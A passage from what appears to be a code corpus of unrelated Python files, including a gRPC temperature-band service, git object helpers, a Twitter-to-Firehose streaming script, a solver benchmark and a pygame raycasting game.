df_do_not_exceed, err = _get_week_do_not_exceed(building, zone, building_date, interval)
if df_do_not_exceed is None:
return None, err
# Note, we need to get a day before the start and after the end of the week to correctly resample due to timezones.
for i in range(DAYS_IN_WEEK + 2):
curr_weekday = (weekday + i - 1) % DAYS_IN_WEEK
curr_day = building_date + datetime.timedelta(days=i - 1)
curr_idx = []
curr_comfortband = []
weekday_comfortband = np.array(comfortband_data[curr_weekday])
for interval_comfortband in weekday_comfortband:
start, end, t_low, t_high = interval_comfortband
start = utils.combine_date_time(start, curr_day)
if t_low is None or t_low == "None":
interval_safety = df_do_not_exceed[start-datetime.timedelta(seconds=interval):start]
                t_low = interval_safety["t_low"].mean()  # TODO: we want a mean weighted by duration; fine approximation for now
if t_high is None or t_high == "None":
interval_safety = df_do_not_exceed[start-datetime.timedelta(seconds=interval):start]
t_high = interval_safety["t_high"].mean()
curr_idx.append(start)
curr_comfortband.append({"t_low": float(t_low),
"t_high": float(t_high)})
list_data.append(pd.DataFrame(index=curr_idx, data=curr_comfortband))
df_comfortband = pd.concat(list_data)
df_comfortband = df_comfortband.tz_convert(date.tzinfo)
rounded_date = utils.decrement_to_start_of_day(date, interval)
df_comfortband = utils.smart_resample(df_comfortband, rounded_date, rounded_date+datetime.timedelta(days=7), interval, "pad")
return df_comfortband, None
def _get_week_do_not_exceed(building, zone, date, interval):
"""
Gets the whole do_not_exceed from the zone configuration file. Correctly Resamples the data according to interval
:param date: The date for which we want to start the week. Timezone aware.
:param interval: float:seconds. The interval/frequency of resampling. Has to be such that 60 % interval == 0
:return: pd.df (col = "t_low", "t_high") with time_series index for the date provided and in timezone aware and in timezone of data input.
"""
config, err = _get_temperature_band_config(building, zone)
if config is None:
return None, err
# Set the date to the controller timezone.
building_date = date.astimezone(tz=pytz.timezone(config["tz"]))
weekday = building_date.weekday()
list_data = []
do_not_exceed_data = config["do_not_exceed"]
# Note, we need to get a day before the start and after the end of the week to correctly resample due to timezones.
for i in range(DAYS_IN_WEEK + 2):
curr_weekday = (weekday + i - 1) % DAYS_IN_WEEK
curr_day = building_date + datetime.timedelta(days=i - 1)
curr_idx = []
curr_do_not_exceed = []
weekday_do_not_exceed = np.array(do_not_exceed_data[curr_weekday])
for interval_do_not_exceed in weekday_do_not_exceed:
start, end, t_low, t_high = interval_do_not_exceed
start = utils.combine_date_time(start, curr_day)
curr_idx.append(start)
curr_do_not_exceed.append({"t_low": float(t_low),
"t_high": float(t_high)})
list_data.append(pd.DataFrame(index=curr_idx, data=curr_do_not_exceed))
df_do_not_exceed = pd.concat(list_data)
df_do_not_exceed = df_do_not_exceed.tz_convert(date.tzinfo)
rounded_date = utils.decrement_to_start_of_day(date, interval)
df_do_not_exceed = utils.smart_resample(df_do_not_exceed, rounded_date, rounded_date+datetime.timedelta(days=7), interval, "pad")
return df_do_not_exceed, None
def get_band(building, zone, start, end, interval, type_band):
"""Gets the comfortband/do_noteceed band of a zone from start to end in interval minutes frequency
:param building: string
:param zone: string
:param start: datetime. timezone aware
:param end: datetime. timezone aware.
:param interval: int:seconds. 24*60*60 % interval == 0
:param type_band: string ["comfortband", "do_not_exceed"] decides which setpoints to get.
:return:
    NOTE: If (end-start).total_seconds % interval != 0, then end is rounded down to the closest
    time for which this condition is satisfied. The new end will also not be inclusive.
"""
if type_band == "comfortband":
first_seven_days, err = _get_week_comfortband(building, zone, start, interval)
elif type_band == "do_not_exceed":
first_seven_days, err = _get_week_do_not_exceed(building, zone, start, interval)
else:
return None, "Invalid method given for band."
if first_seven_days is None:
return None, err
first_seven_days_start = first_seven_days.index[0]
first_seven_days_end = first_seven_days_start + datetime.timedelta(days=DAYS_IN_WEEK)
if end < first_seven_days_end:
return first_seven_days[start:end][:-1], None
# get band for the day after the first 7 days we found.
remaining_data = []
for i in range((end - first_seven_days_end).days + 1):
curr_offset = i % DAYS_IN_WEEK
curr_time = first_seven_days_end + datetime.timedelta(days=i)
curr_data = first_seven_days[first_seven_days_start + datetime.timedelta(days=curr_offset):
first_seven_days_start + datetime.timedelta(days=curr_offset + 1)][:int(24*60*60/interval)]
curr_start_date = curr_time
curr_end_date = curr_start_date + datetime.timedelta(days=1)
date_range = pd.date_range(start=curr_start_date, end=curr_end_date, freq=str(interval/60.) + "T")[:-1]
curr_data.index = date_range
remaining_data.append(curr_data)
band_series = pd.concat([first_seven_days] + remaining_data)
return band_series[start:end][:-1], None
def get_comfortband(request):
"""Returns comfortband data for a given request or None."""
start_time = time.time()
logging.info("received request:", request.building, request.zone, request.start, request.end, request.window, request.unit)
duration = utils.get_window_in_sec(request.window)
request_length = [len(request.building), len(request.zone), request.start, request.end,
duration]
if any(v == 0 for v in request_length):
return None, "invalid request, empty params"
# if request.end > int(time.time() * 1e9):
# return None, "invalid request, end date is in the future. Now: %d and end: %d" % (
# time.time() * 1e9, request.end)
if request.start >= request.end:
return None, "invalid request, start date is after end date."
if request.start < 0 or request.end < 0:
return None, "invalid request, negative dates"
if request.start + (duration * 1e9) > request.end:
return None, "invalid request, start date + window is greater than end date"
if request.unit != "F":
return None, "invalid request, only fahrenheit support."
if 60*60 % duration != 0:
return None, "invalid request, window is not a factor of an hour (60(min)*60(sec)%window != 0). e.g. 15min is a factor but 25 is not."
start_datetime = datetime.datetime.utcfromtimestamp(
float(request.start / 1e9)).replace(tzinfo=pytz.utc)
end_datetime = datetime.datetime.utcfromtimestamp(
float(request.end / 1e9)).replace(tzinfo=pytz.utc)
error_checking_time = time.time()
comfortband, err = get_band(request.building, request.zone, start_datetime, end_datetime, duration, "comfortband")
if comfortband is None:
return [temperature_bands_pb2.SchedulePoint()], err
comfortband_time = time.time()
grpc_comfortband = []
for index, row in comfortband.iterrows():
grpc_comfortband.append(
temperature_bands_pb2.SchedulePoint(time=int(index.timestamp() * 1e9),
temperature_low=row["t_low"],
temperature_high=row["t_high"],
unit="F"))
response_creation_time = time.time()
logging.info("Error checking time %f seconds" % (error_checking_time - start_time ))
logging.info("Comfortband time %f seconds" % (comfortband_time - error_checking_time ))
logging.info("Response creation time %f seconds" % (response_creation_time - comfortband_time ))
return grpc_comfortband,None
# return temperature_bands_pb2.ScheduleReply(schedules=grpc_comfortband), None
def get_do_not_exceed(request):
"""Returns preprocessed thermal data for a given request or None."""
logging.info("received request:", request.building, request.zone, request.start, request.end, request.window, request.unit)
duration = utils.get_window_in_sec(request.window)
request_length = [len(request.building), len(request.zone), request.start, request.end,
duration]
if any(v == 0 for v in request_length):
return None, "invalid request, empty params"
# if request.end > int(time.time() * 1e9):
# return None, "invalid request, end date is in the future. Now: %d and end: %d" % (
# time.time() * 1e9, request.end)
if request.start >= request.end:
return None, "invalid request, start date is after end date."
if request.start < 0 or request.end < 0:
return None, "invalid request, negative dates"
if request.start + (duration * 1e9) > request.end:
return None, "invalid request, start date + window is greater than end date"
if request.unit != "F":
return None, "invalid request, only fahrenheit support."
if 60*60 % duration != 0:
return None, "invalid request, window is not a factor of an hour (60(min)*60(sec)%window != 0). e.g. 15min is a factor but 25 is not."
start_datetime = datetime.datetime.utcfromtimestamp(
float(request.start / 1e9)).replace(tzinfo=pytz.utc)
end_datetime = datetime.datetime.utcfromtimestamp(
float(request.end / 1e9)).replace(tzinfo=pytz.utc)
do_not_exceed, err = get_band(request.building, request.zone, start_datetime, end_datetime, duration, "do_not_exceed")
if do_not_exceed is None:
return [temperature_bands_pb2.SchedulePoint()], err
grpc_do_not_exceed = []
for index, row in do_not_exceed.iterrows():
grpc_do_not_exceed.append(
temperature_bands_pb2.SchedulePoint(time=int(index.timestamp() * 1e9),
temperature_low=row["t_low"],
temperature_high=row["t_high"],
unit="F"))
return grpc_do_not_exceed,None
# return temperature_bands_pb2.ScheduleReply(schedules=grpc_do_not_exceed), None
class SchedulesServicer(temperature_bands_pb2_grpc.SchedulesServicer):
def __init__(self):
pass
def GetComfortband(self, request, context):
"""A simple RPC.
Sends the outside temperature for a given building, within a duration (start, end), and a requested window
An error is returned if there are no temperature for the given request
"""
comfortband, error = get_comfortband(request)
if comfortband is None:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details(error)
return temperature_bands_pb2.SchedulePoint()
elif error is not None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details(error)
for band in comfortband:
yield band
# return comfortband
def GetDoNotExceed(self, request, context):
"""A simple RPC.
Sends the outside temperature for a given building, within a duration (start, end), and a requested window
An error is returned if there are no temperature for the given request
"""
do_not_exceed, error = get_do_not_exceed(request)
if do_not_exceed is None:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details(error)
return temperature_bands_pb2.SchedulePoint()
elif error is not None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details(error)
for dne in do_not_exceed:
yield dne
# return do_not_exceed
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
temperature_bands_pb2_grpc.add_SchedulesServicer_to_server(SchedulesServicer(), server)
server.add_insecure_port(TEMPERATURE_BANDS_HOST_ADDRESS)
logging.info("Serving on {0} with data path {1}".format(TEMPERATURE_BANDS_HOST_ADDRESS, TEMPERATURE_BANDS_DATA_PATH))
server.start()
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
server.stop(0)
if __name__ == '__main__':
serve()
|
470809
|
import numpy as np
import six
from chainercv.utils.testing.assertions.assert_is_image import assert_is_image
from chainercv.utils.testing.assertions.assert_is_point import assert_is_point
def assert_is_point_dataset(dataset, n_point=None, n_example=None,
no_visible=False):
"""Checks if a dataset satisfies the point dataset API.
This function checks if a given dataset satisfies the point dataset
API or not.
    If the dataset does not satisfy the API, this function raises an
:class:`AssertionError`.
Args:
dataset: A dataset to be checked.
n_point (int): The number of expected points per image.
If this is :obj:`None`, the number of points per image can be
arbitrary.
n_example (int): The number of examples to be checked.
If this argument is specified, this function picks
            examples randomly and checks them. Otherwise,
this function checks all examples.
no_visible (bool): If :obj:`True`, we assume that
:obj:`visible` is always not contained.
            If :obj:`False`, :obj:`visible` may or may not be contained.
"""
assert len(dataset) > 0, 'The length of dataset must be greater than zero.'
if n_example:
for _ in six.moves.range(n_example):
i = np.random.randint(0, len(dataset))
_check_example(dataset[i], n_point, no_visible)
else:
for i in six.moves.range(len(dataset)):
_check_example(dataset[i], n_point, no_visible)
def _check_example(example, n_point=None, no_visible=False):
assert len(example) >= 2, \
'Each example must have at least two elements:' \
'img, point (visible is optional).'
if len(example) == 2 or no_visible:
img, point = example[:2]
visible = None
elif len(example) >= 3:
img, point, visible = example[:3]
assert_is_image(img, color=True)
assert_is_point(point, visible, img.shape[1:], n_point)
|
470819
|
import pandas as pd
from odin.strategy.indicators import MovingAverage as MA
from odin.utilities.mixins.strategy_mixins import (
LongStrategyMixin,
EqualBuyProportionMixin,
TotalSellProportionMixin,
DefaultPriorityMixin,
NeverSellIndicatorMixin
)
class MovingAverageCrossoverStrategy(
LongStrategyMixin,
EqualBuyProportionMixin,
TotalSellProportionMixin,
DefaultPriorityMixin,
NeverSellIndicatorMixin
):
def buy_indicator(self, feats):
"""Implementation of abstract base class method."""
return (
feats.name == "AAPL" and
feats["short_mavg"] > feats["long_mavg"]
)
def exit_indicator(self, feats):
"""Implementation of abstract base class method."""
return (
feats["long_mavg"] > feats["short_mavg"]
)
def generate_features(self):
"""Implementation of abstract base class method."""
series = self.portfolio.data_handler.bars["adj_price_close"]
feats = pd.DataFrame(index=series.columns)
feats["long_mavg"] = MA(200).simple_moving_average(series)
feats["short_mavg"] = MA(50).simple_moving_average(series)
return feats
|
470844
|
import matplotlib.pyplot as plt
import mxnet as mx
if __name__ == '__main__':
image = 'ILSVRC2012_val_00000008.JPEG'
image_name = image.split(".")[0]
image_string = open('../image/{}'.format(image), 'rb').read()
data = mx.image.imdecode(image_string, flag=1)
plt.imshow(data.asnumpy())
plt.savefig('{}_original.png'.format(image_name))
cast = mx.image.CastAug()
data = cast(data)
brightness = mx.image.BrightnessJitterAug(brightness=0.3)
brightness_data = brightness(data)
brightness_data = mx.nd.Cast(brightness_data, dtype='uint8')
plt.imshow(brightness_data.asnumpy())
plt.savefig('{}_brightness.png'.format(image_name))
|
470845
|
from git_remote_dropbox.constants import DEVNULL
import subprocess
import zlib
EMPTY_TREE_HASH = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'
def command_output(*args, **kwargs):
"""
Return the result of running a git command.
"""
args = ('git',) + args
output = subprocess.check_output(args, stderr=DEVNULL)
if kwargs.get('decode', True):
output = output.decode('utf8')
if kwargs.get('strip', True):
output = output.strip()
return output
def command_ok(*args):
"""
Return whether a git command runs successfully.
"""
args = ('git',) + args
return subprocess.call(args, stdout=DEVNULL, stderr=DEVNULL) == 0
def is_ancestor(ancestor, ref):
"""
Return whether ancestor is an ancestor of ref.
This returns true when it is possible to fast-forward from ancestor to ref.
"""
return command_ok('merge-base', '--is-ancestor', ancestor, ref)
def object_exists(sha):
"""
Return whether the object exists in the repository.
"""
return command_ok('cat-file', '-e', sha)
def history_exists(sha):
"""
Return whether the object, along with its history, exists in the
repository.
"""
return command_ok('rev-list', '--objects', sha)
def ref_value(ref):
"""
Return the hash of the ref.
"""
return command_output('rev-parse', ref)
def symbolic_ref_value(name):
"""
Return the branch head to which the symbolic ref refers.
"""
return command_output('symbolic-ref', name)
def object_kind(sha):
"""
Return the type of the object.
"""
return command_output('cat-file', '-t', sha)
def object_data(sha, kind=None):
"""
Return the contents of the object.
If kind is None, return a pretty-printed representation of the object.
"""
if kind is not None:
return command_output('cat-file', kind, sha, decode=False, strip=False)
else:
return command_output('cat-file', '-p', sha, decode=False, strip=False)
def encode_object(sha):
"""
Return the encoded contents of the object.
The encoding is identical to the encoding git uses for loose objects.
This operation is the inverse of `decode_object`.
"""
kind = object_kind(sha)
size = command_output('cat-file', '-s', sha)
contents = object_data(sha, kind)
data = kind.encode('utf8') + b' ' + size.encode('utf8') + b'\0' + contents
compressed = zlib.compress(data)
return compressed
def decode_object(data):
"""
Decode the object, write it, and return the computed hash.
This operation is the inverse of `encode_object`.
"""
decompressed = zlib.decompress(data)
header, contents = decompressed.split(b'\0', 1)
kind = header.split()[0]
return write_object(kind.decode('utf8'), contents)
def write_object(kind, contents):
p = subprocess.Popen(['git', 'hash-object', '-w', '--stdin', '-t', kind],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=DEVNULL)
sha = p.communicate(contents)[0].decode('utf8').strip()
return sha
def list_objects(ref, exclude):
"""
Return the objects reachable from ref excluding the objects reachable from
exclude.
"""
exclude = ['^%s' % obj for obj in exclude if object_exists(obj)]
objects = command_output('rev-list', '--objects', ref, *exclude)
if not objects:
return []
return [i.split()[0] for i in objects.split('\n')]
def referenced_objects(sha):
"""
Return the objects directly referenced by the object.
"""
kind = object_kind(sha)
if kind == 'blob':
# blob objects do not reference any other objects
return []
data = object_data(sha).decode('utf8').strip()
if kind == 'tag':
# tag objects reference a single object
obj = data.split('\n')[0].split()[1]
return [obj]
elif kind == 'commit':
# commit objects reference a tree and zero or more parents
lines = data.split('\n')
tree = lines[0].split()[1]
objs = [tree]
for line in lines[1:]:
if line.startswith('parent '):
objs.append(line.split()[1])
else:
break
return objs
elif kind == 'tree':
# tree objects reference zero or more trees and blobs, or submodules
if not data:
# empty tree
return []
lines = data.split('\n')
# submodules have the mode '160000' and the kind 'commit', we filter them out because
# there is nothing to download and this causes errors
return [line.split()[2] for line in lines if not line.startswith('160000 commit ')]
else:
raise Exception('unexpected git object type: %s' % kind)
def get_remote_url(name):
"""
Return the URL of the given remote.
"""
return command_output('remote', 'get-url', name)
|
470867
|
import json
import boto3
import requests
from textblob import TextBlob
from ConfigParser import SafeConfigParser
from twitter import Twitter, OAuth, TwitterHTTPError, TwitterStream
# Read the Config File to get the twitter keys and tokens
config = SafeConfigParser()
config.read('twitter-rekognition.config')
# Create an S3 client
s3 = boto3.client('s3')
bucket = config.get('s3', 'twitter_bucket')
# Firehose delivery stream to stream tweets
fh = boto3.client('firehose')
deliverystream_name = config.get('firehose', 'deliverystream_name')
# Twitter Configuration keys
consumer_secret = config.get('keys', 'consumer_secret')
consumer_key = config.get('keys', 'consumer_key')
access_token = config.get('keys', 'access_token')
access_token_secret = config.get('keys', 'access_token_secret')
# Twitter user
user = "awsgrant"
if __name__ == '__main__':
try:
oauth = OAuth(access_token, access_token_secret, consumer_key, consumer_secret)
# Connect to Twitter Streaming API
#twitter_stream = TwitterStream(auth = oauth)
# UNCOMMENT when ready to test
twitter_stream = TwitterStream(auth = oauth, secure = True)
# Get an iterator on the public data following through Twitter
#tweet_iterator = twitter_stream.statuses.filter(locations='-180,-90,180,90')
#print(json.loads(twitter_stream))
# UNCOMMENT when ready to test
tweets = twitter_stream.statuses.filter(track=user)
for tweet in tweets:
#print json.dumps(tweet, indent=2, sort_keys=True)
#entities = tweet.get("entities")
entities = tweet.get("extended_entities")
            print(json.dumps(entities, indent=2, sort_keys=True))
            if (entities):
                print(json.dumps(entities, indent=2, sort_keys=True))
media_list = entities.get("media")
if (media_list):
for media in media_list:
if (media.get("type", None) == "photo"):
#print json.dumps(media, indent=2, sort_keys=True)
twitter_data = {}
description = tweet.get("user").get("description")
loc = tweet.get("user").get("location")
text = tweet.get("text")
coords = tweet.get("coordinates")
geo = tweet.get("geo")
name = tweet.get("user").get("screen_name")
user_created = tweet.get("user").get("created_at")
followers = tweet.get("user").get("followers_count")
id_str = tweet.get("id_str")
created = tweet.get("created_at")
retweets = tweet.get("retweet_count")
bg_color = tweet.get("user").get("profile_background_color")
blob = TextBlob(text)
sent = blob.sentiment
image_url = media.get("media_url")
twitter_data['description'] = description
twitter_data['loc'] = loc
twitter_data['text'] = text
twitter_data['coords'] = coords
twitter_data['geo'] = geo
twitter_data['name'] = name
twitter_data['user_created'] = user_created
twitter_data['followers'] = followers
twitter_data['id_str'] = id_str
twitter_data['created'] = created
twitter_data['retweets'] = retweets
twitter_data['bg_color'] = bg_color
twitter_data['sent'] = sent
twitter_data['image_url'] = image_url
# Stream the content via Kinesis Firehose Deliver to S3
print("Sending to Kinesis")
response = fh.put_record(
DeliveryStreamName=deliverystream_name,
Record = {'Data': json.dumps(twitter_data, indent = 4)}
)
except Exception as e:
        print(e)
|
470902
|
from matplotlib.ticker import FormatStrFormatter
from phi.backend.base import load_tensorflow
from phi.solver.cuda.cuda import CudaPressureSolver
from phi.solver.sparse import SparseCGPressureSolver
import matplotlib.pyplot as plt
from phi.solver.cuda.benchmarks.benchmark_utils import *
cudaSolver = CudaPressureSolver()
sparseCGSolver = SparseCGPressureSolver()
# configuration of the benchmark
warmup = 5
testruns = 25
dimension = 3
accuracy = 1e-5
batch_size = 1
cpuTests = []#[8, 16, 32, 64, 128]
tfTests = []#[8, 16, 32, 64, 128]
cudaTests = [8, 16, 32, 64, 128]#, 256]
# benchmark
load_tensorflow()
cudaTimes = benchmark_pressure_solve(cudaSolver, cudaTests, dimension, tf.float32, warmup, testruns, accuracy, batch_size)
tfTimes = benchmark_pressure_solve(sparseCGSolver, tfTests, dimension, tf.float64, warmup, testruns, accuracy, batch_size)
cpuTimes = benchmark_pressure_solve(sparseCGSolver, cpuTests, dimension, tf.float64, warmup, testruns, accuracy, batch_size, cpu=True)
cudaAVG = [np.mean(a) for a in cudaTimes]
cudaSTD = [np.std(a) for a in cudaTimes]
tfAVG = [np.mean(a) for a in tfTimes]
tfSTD = [np.std(a) for a in tfTimes]
cpuAVG = [np.mean(a) for a in cpuTimes]
cpuSTD = [np.std(a) for a in cpuTimes]
# serialize and print all data necessary for the graph
print("cudaTests = " + str(cudaTests))
print("cudaAVG = " + str(cudaAVG))
print("cudaSTD = " + str(cudaSTD))
print("tfTests = " + str(tfTests))
print("tfAVG = " + str(tfAVG))
print("tfSTD = " + str(tfSTD))
print("cpuTests = " + str(cpuTests))
print("cpuAVG = " + str(cpuAVG))
print("cpuSTD = " + str(cpuSTD))
plt.errorbar(tfTests, tfAVG, tfSTD, fmt='-o')
plt.errorbar(cpuTests, cpuAVG, cpuSTD, fmt='-o')
plt.errorbar(cudaTests, cudaAVG, cudaSTD, fmt='-o')
plt.legend(['Tensorflow GPU', 'Tensorflow CPU', 'CUDA'], loc='upper left')
plt.xscale('log', basex=2)
plt.yscale('log')
plt.xticks(cudaTests)
ax = plt.gca()
ax.xaxis.set_major_formatter(FormatStrFormatter('%.0f'))
plt.xlabel("Grid Dimension 3D")
plt.ylabel("Computation Time in seconds")
plt.show()
|
470903
|
import pygame as pg
import numpy as np
from numba import njit
def main():
pg.init()
pg.display.set_caption("Dead and - A Python game by FinFET, thanks for playing!")
font = pg.font.SysFont("Courier New", 70)
sounds = load_sounds()
m_vol, sfx_vol, music = 0.4, 0.5, 0
set_volume(m_vol, sfx_vol, sounds)
sounds['music'+str(music)].play(-1)
stepdelay = pg.time.get_ticks()/200
stepdelay2 = stepdelay
click, clickdelay = 0, stepdelay
screen = pg.display.set_mode((800,600))
running, pause, options, newgame = 1, 1, 0, 2
clock = pg.time.Clock()
pg.mouse.set_visible(False)
timer = 0
hres, halfvres, mod, frame = adjust_resolution()
fullscreen = 0
level, player_health, swordsp, story = 0, 0, 0, 0
#sky1, floor, wall, door, window, enemies
level_textures = [[0, 1, 0, 0, 1, 4], #level 0
[0, 2, 1, 1, 0, 3], #level 1
[1, 0, 2, 1, 1, 4], #level 2
[1, 3, 1, 0, 0, 1], #level 3
[2, 1, 2, 1, 1, 0], #level 4
[2, 0, 0, 0, 0, 2]] #level 5
menu = [pg.image.load('Assets/Textures/menu0.png').convert_alpha()]
menu.append(pg.image.load('Assets/Textures/options.png').convert_alpha())
menu.append(pg.image.load('Assets/Textures/credits.png').convert_alpha())
menu.append(pg.image.load('Assets/Textures/menu1.png').convert_alpha())
hearts = pg.image.load('Assets/Textures/hearts.png').convert_alpha()
colonel = pg.image.load('Assets/Sprites/colonel1.png').convert_alpha()
hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
exit1 = pg.image.load('Assets/Textures/exit.png').convert_alpha()
exit2 = 1
exits = [pg.Surface.subsurface(exit1,(0,0,50,50)), pg.Surface.subsurface(exit1,(50,0,50,50))]
splash = []
for i in range(4):
splash.append(pg.image.load('Assets/Textures/splash'+str(i)+'.jpg').convert())
blood = pg.image.load('Assets/Textures/blood0.png').convert_alpha()
blood_size = np.asarray(blood.get_size())
sky1 = hearts.copy() # initialize with something to adjust resol on start
msg = "Press any key..."
surf = splash[0].copy()
splash_screen(msg, splash[0], clock, font, screen)
msg = " "
while running:
pg.display.update()
ticks = pg.time.get_ticks()/200
er = min(clock.tick()/500, 0.3)
if not pause and (player_health <= 0 or (exit2 == 0 and int(posx) == exitx and int(posy) == exity)):
msg = ' '
if player_health <= 0:
sounds['died'].play()
newgame = 2
surf = splash[3].copy()
else:
level += 1
player_health = min(player_health+2, 20)
sounds['won'].play()
newgame = 1
if level > 5:
level, newgame = 0, 2
sounds['died'].play()
surf = splash[2].copy()
surf.blit(font.render('Total time: ' + str(round(timer,1)), 1, (255, 255, 255)), (20, 525))
else:
msg = "Cleared level " + str(level-1)+'!'
splash_screen(msg, surf, clock, font, screen)
pause, clickdelay = 1, ticks
pg.time.wait(500)
if pg.mouse.get_pressed()[0]:
if swordsp < 1 and not pause:
swordsp, damage_mod = 1, 1
if pause and ticks - clickdelay > 1:
click, clickdelay = 1, ticks
sounds['healthup'].play()
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
if event.type == pg.KEYDOWN:
if event.key == ord('p') or event.key == pg.K_ESCAPE:
if not pause:
pause = 1
else:
if options > 0:
options = 0
elif newgame == 0:
pause = 0
pg.mouse.set_pos(400,300)
if event.key == ord('f'): # toggle fullscreen
pg.display.toggle_fullscreen()
fullscreen = not(fullscreen)
if pause:
clock.tick(60)
surf2, pause, options, running, newgame, adjust_res, m_vol, sfx_vol, story = pause_menu(
surf.copy(), menu, pause, options, click, running, m_vol, sfx_vol, sounds, newgame, font, msg, level, ticks, hres, story)
if adjust_res != 1:
hres, halfvres, mod, frame = adjust_resolution(int(hres*adjust_res))
sky = pg.surfarray.array3d(pg.transform.smoothscale(sky1, (720, halfvres*4)))
adjust_res = 1
screen.blit(surf2, (0,0))
click = 0
if newgame == 1:
newgame, pause = 0, not(pause)
if player_health <= 0 or msg[0] != 'C':
surf = splash[1].copy()
splash_screen(' ', surf, clock, font, screen)
level, player_health, timer = 0, 20, -0.1
if np.random.randint(0, 2) != music:
sounds['music'+str(music)].fadeout(1000)
music = int(not(music))
sounds['music'+str(music)].play(-1)
msg = 'Loading...'
surf2 = surf.copy()
surf2.blit(font.render(msg, 1, (255, 255, 255)), (30, 500))
surf2.blit(font.render(msg, 1, (30, 255, 155)), (32, 502))
screen.blit(surf2, (0,0))
pg.display.update()
msg = 'Kill the monsters!'
if story:
posx, posy, rot, rotv, maph, mapc, exitx, exity, stepscount, size = load_map(level)
nlevel = level_textures[level]
else:
size = np.random.randint(10+level*2, 16+level*2)
nenemies = size #number of enemies
posx, posy, rot, rotv, maph, mapc, exitx, exity, stepscount = gen_map(size)
nlevel = [np.random.randint(0,3), #sky1
np.random.randint(0,4), #floorwall
np.random.randint(0,3), #wall
np.random.randint(0,2), #door
np.random.randint(0,2), #window
np.random.randint(0,5), #enemies
]
nenemies = level**2 + 10 + level #number of enemies
sprites, spsize, sword, swordsp = get_sprites(nlevel[5])
sky1, floor, wall, bwall, door, window = load_textures(nlevel)
sky = pg.surfarray.array3d(pg.transform.smoothscale(sky1, (720, halfvres*4)))
enemies = spawn_enemies(nenemies, maph, size, posx, posy, level/2)
hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
exit2, damage_mod, blood_scale = 1, 1, 1
mape, minimap = np.zeros((size, size)), np.zeros((size, size, 3))
sounds['healthup'].play()
else:
timer = timer + er/2
frame = new_frame(posx-0.2*np.cos(rot), posy-0.2*np.sin(rot), rot, frame, sky, floor, hres, halfvres,
mod, maph, size, wall, mapc, exitx, exity, nenemies, rotv, door, window, bwall, exit2)
surf = pg.surfarray.make_surface(frame)
mape = np.zeros((size, size))
health = player_health
enemies, player_health, mape = enemies_ai(posx, posy, enemies, maph, size, mape, swordsp, ticks, player_health, nenemies, level/3)
enemies = sort_sprites(posx-0.2*np.cos(rot), posy-0.2*np.sin(rot), rot, enemies, maph, size, er/3)
if exit2 == 0:
surf = draw_colonel(surf, colonel, posx-0.2*np.cos(rot), posy-0.2*np.sin(rot), exitx+0.5, exity+0.5,
hres, halfvres, rot, rotv, maph, size)
surf, en = draw_sprites(surf, sprites, enemies, spsize, hres, halfvres, ticks, sword, swordsp, rotv)
if int(swordsp) > 0 and damage_mod < 1:
blood_scale = blood_scale*(1 + 2*er)
scaled_blood = pg.transform.scale(blood, 4*blood_scale*blood_size*hres/800)
surf.blit(scaled_blood, np.asarray([hres/2, halfvres]) - 2*blood_scale*blood_size*hres/800)
surf = pg.transform.scale2x(surf)
surf = pg.transform.smoothscale(surf, (800, 600))
surf.blit(hearts2, (20,20))
if exit2 == 0:
minimap[int(posx)][int(posy)] = (50, 50, 255)
surfmap = pg.surfarray.make_surface(minimap.astype('uint8'))
surfmap = pg.transform.scale(surfmap, (size*5, size*5))
surf.blit(surfmap,(20, 50), special_flags=pg.BLEND_ADD)
minimap[int(posx)][int(posy)] = (100, 100, 0)
surf.blit(font.render(str(round(timer,1)), 1, (255, 255, 255)), (20, 525))
surf.blit(exits[exit2], (730,20))
screen.blit(surf, (0,0))
if health > player_health:
hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
sounds['hurt'].play()
if ticks - stepdelay > 2 and stepscount != posx + posy:
sounds['step'].play()
stepdelay = ticks
stepscount = posx + posy
if mape[int(posx)][int(posy)] > 0:
delaycontrol = max(0.3, 2/np.random.uniform(0.99, mape[int(posx)][int(posy)]))
if ticks - stepdelay2 > delaycontrol:
sounds['step2'].play()
stepdelay2 = ticks
if int(swordsp) > 0:
if swordsp == 1:
damage_mod = 1
while enemies[en][3] < 10 and damage_mod > 0.4 and en >= 0:
x = posx -0.2*np.cos(rot) + np.cos(rot + np.random.uniform(0, 0.05))/enemies[en][3]
y = posy -0.2*np.sin(rot) + np.sin(rot + np.random.uniform(0, 0.05))/enemies[en][3]
z = 0.5 + np.sin(rotv*-0.392699)/enemies[en][3]
dist2en = np.sqrt((enemies[en][0]-x)**2 + (enemies[en][1]-y)**2)
if dist2en < 0.1 and z > 0 and z < 0.07*enemies[en][5]:
if z > 0.05*enemies[en][5]:
enemies[en][8] = enemies[en][8] - np.random.uniform(0,2)*2
else:
enemies[en][8] = enemies[en][8] - np.random.uniform(0,2)
enemies[en][10] = ticks
x = enemies[en][0] + 0.1*np.cos(rot)
y = enemies[en][1] + 0.1*np.sin(rot)
if maph[int(x)][int(y)] == 0:
enemies[en][0]= (x + enemies[en][0])/2 # push back
enemies[en][1]= (y + enemies[en][1])/2
if damage_mod == 1:
blood_scale = enemies[en][3]
sounds['swoosh'].play()
if enemies[en][4]:
sounds['hitmonster2'].set_volume(min(1, enemies[en][3])*sfx_vol)
sounds['hitmonster2'].play()
else:
sounds['hitmonster'].set_volume(min(1, enemies[en][3])*sfx_vol)
sounds['hitmonster'].play()
damage_mod = damage_mod*0.5
if enemies[en][8] < 0:
sounds['deadmonster'].set_volume(min(1, enemies[en][3])*sfx_vol)
sounds['deadmonster'].play()
nenemies = nenemies - 1
if nenemies == 0:
exit2, msg = 0, "Find the master!"
## if np.random.uniform(0,1) < 0.3:
## player_health = min(player_health+0.5, 20)
## hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
## sounds['healthup'].play()
en = en - 1
if damage_mod == 1:
sounds['swoosh2'].play()
swordsp = (swordsp + er*10)%4
fps = int(clock.get_fps())
